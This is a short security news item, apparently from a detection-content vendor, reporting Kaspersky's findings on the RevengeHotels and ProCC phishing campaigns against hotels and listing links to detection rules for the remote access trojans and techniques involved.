Delaware, USA – November 29, 2019 – The RevengeHotels campaign is conducted by several separate cybercriminal groups that have been able to compromise more than 20 hotels in South and Central America, Europe and Thailand. Kaspersky Lab experts found two groups with similar Tactics, Techniques, and Procedures that have been active since at least 2015 and increased the intensity of attacks in 2019. Experts monitored the activities of the group over a year, tracked the location of 1400+ potential victims, and found that almost three-quarters of the attacked organizations were located in Brazil, and the remaining part of hotels and hostels are in 20+ countries worldwide. Adversaries are interested in credit card data from guests and the opportunity to sell access to compromised systems.
The first group discovered by Kaspersky Lab was called RevengeHotels, the second was named ProCC. Both groups use highly targeted phishing emails with malicious attachments and use a lot of social engineering to convince victims of the authenticity of the letters. Attackers present themselves as existing organizations or government entities by registering typo-squatting domains shortly before sending emails. The text of the letter usually refers to booking a large number of rooms for employees. Malicious document executes macro code containing PowerShell commands to download and run the final payload. The RevengeHotels group uses mainly commercial Remote Access Trojans (Revenge RAT, NanoCore RAT, NjRAT) with additional modules to steal data from clipboard and taking screenshots. ProCC created their custom backdoor with similar functionality, but it is also capable of stealing data from printer spooler.
Among other things, attackers seek to obtain credentials from the hotel administration software, since credit card data stolen from there is of greater value in carders forums.
Content to detect such attacks:
Nanocore Malware Detector (Sysmon Behavior Analysis) – https://tdm.socprime.com/tdm/info/U0tbIdHrUOeU/
NanoCore RAT (Sysmon). – https://tdm.socprime.com/tdm/info/0XCDttzG23kF/
Revenge RAT tool – https://tdm.socprime.com/att-ck/?tools%5B%5D=S0379
PowerShell technique – https://tdm.socprime.com/att-ck/?techniques%5B%5D=T1086
Template Injection technique – https://tdm.socprime.com/att-ck/?techniques%5B%5D=T1221